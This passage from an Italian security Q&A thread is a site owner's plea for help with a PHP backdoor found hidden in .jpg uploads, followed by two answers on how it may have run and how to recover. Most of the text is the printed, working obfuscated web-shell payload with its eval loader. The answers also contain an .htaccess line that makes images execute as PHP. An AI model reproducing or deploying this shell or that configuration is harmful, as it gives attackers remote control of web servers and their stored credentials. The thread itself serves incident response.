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";error_reporting(0);@set_time_limit(0);eval("?>".gzuncompress(base64_decode($shell_code)));
?>

La strana parte è che questo script è presente da aprile, ma ora è settembre, quindi penso che questa non sia la causa, quindi sto usando netstat per la porta aperta ma ancora una volta non ci sono risultati sospetti. Ho davvero bisogno del tuo aiuto ragazzi

Grazie

    
posta spacetrack 19.09.2017 - 05:16
fonte

2 risposte

6

Il meglio che posso dire, qualcuno ha caricato questa immagine sul tuo server e poi ha tentato di eseguirla navigando verso il percorso dell'URL dell'immagine (che potrebbe essere stata eseguita come php? a seconda delle impostazioni di sicurezza).

Anche se è stato eseguito, il punto del codice è molto probabilmente una shell inversa. Ho fatto un po 'di googling e mentre quello che hai è v2 del codice, v1 assomiglia a (codice sorgente su github ... safe-ish) . Dovrebbe essere notato che l'uso di una shell inversa NON verrebbe visualizzato in Audit Logs o User Logs ... dovresti invece controllare i server web access logs come negli ultimi 6 mesi per chiunque acceda a uno di questi .jpg file.

Se la persona fosse in grado di aprire una shell inversa in questo modo, in teoria, avrebbero solo accesso all'utente che esegue il servizio ... e a meno che tu non abbia fatto qualcosa di veramente brutto, significa che avevano accesso alla shell a un utente con restrizioni apache che ha completamente accesso in lettura a /etc/passwd proprio come tutti gli altri utenti sulla scatola.

ca@ca-chi:~$ ls -lah /etc/passwd
-rw-r--r-- 1 root root 2.0K Aug 28 13:09 /etc/passwd

e per essere perfettamente onesti ... a chi importa? Ecco il cat /etc/passwd del mio private vps ... fatto da un utente non sudo

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
ntp:x:111:115::/home/ntp:/bin/false
git:x:1000:1000:Gogs Git User:/opt/containers/gogs/data/git:/bin/bash
ca:x:1001:1001:,,,:/home/ca:/bin/bash

Se dai un'occhiata al file ... in pratica contiene:

DESCRIPTION
       /etc/passwd contains one line for each user account, with seven fields
       delimited by colons (“:”). These fields are:
       ·   login name
       ·   optional encrypted password
       ·   numerical user ID
       ·   numerical group ID
       ·   user name or comment field
       ·   user home directory
       ·   optional user command interpreter

( fonte )

Si noti che l'unica parte relativa di questo è il optional encrypted password che per impostazione predefinita sulla maggior parte dei sistemi viene sostituito semplicemente con un x (sentiti libero di controllare il tuo ... il file che ho postato non è modificato dal suo contenuto originale )

Avrebbero anche accesso in sola lettura al sorgente di tutti i file PHP in webroot. Ciò significa che tutte le impostazioni di configurazione come il nome utente / password per il database MySQL e qualsiasi sorgente / chiave di crittografia / tabelle utente / sale / pepe / ... ecc. Questo è un pò brutto, dovresti forse aggiornare le password su molto di tutto

Ora, va notato che non avrebbero mai dovuto arrivare così lontano ... il fatto che il tuo server possa eseguire file caricati come PHP è disastroso ... e dovrebbe essere risolto al più presto. Inoltre, se quella parte del tuo server non fosse sicura ... chissà in quale altro modo sono entrati. Personalmente vorrei Nuke From Orbit è l'unico modo per essere sicuro.

  • Avrei messo in piedi un nuovo VPS con migliori impostazioni di sicurezza per php
  • Migra il codice sorgente TRUSTED da VERSION CONTROL (in particolare non dal server eventualmente infetto)
  • Verifica le cartelle create per contenere il contenuto dell'utente per verificare che non possa contenere cgi
  • Scarica l'SQL del server originale (se applicabile) in XML o in un file .SQL ed esegui alcune ricerche reg-ex su di esso per verificare che non contenga nulla di sospetto.
  • Migrare il contenuto dell'utente (immagini, file, ecc.)
  • Blocca tutti gli account utente e impone la modifica della password tramite Email all'accesso successivo
  • Notifica alla tua base di utenti che hai avuto una violazione della sicurezza e dati utente come Username / Email / hashed? -password (spero che tu li abbia archiviati correttamente) sono fuori in the wild e è solo una questione di tempo prima che le password siano incrinato.

Good Luck

    
risposta data 19.09.2017 - 06:48
fonte
1

Dalla mia esperienza sembra che se avessi le giuste impostazioni sul tuo PHP init, quei file non dovrebbero essere in grado di eseguire il codice php all'interno mentre terminano con .jpg invece di .php. Quindi l'attaccante non dovrebbe essere in grado di aprire una webshell sul tuo server.

Anche se hai questa riga in .htaccess, di sicuro saranno in grado di eseguire quel codice.

AddType application/x-httpd-php .jpg

Naturalmente supponendo che tu sia stato compromesso e prendere tutte le azioni necessarie è il modo di affrontare questo problema.

    
risposta data 19.09.2017 - 14:51
fonte

Leggi altre domande sui tag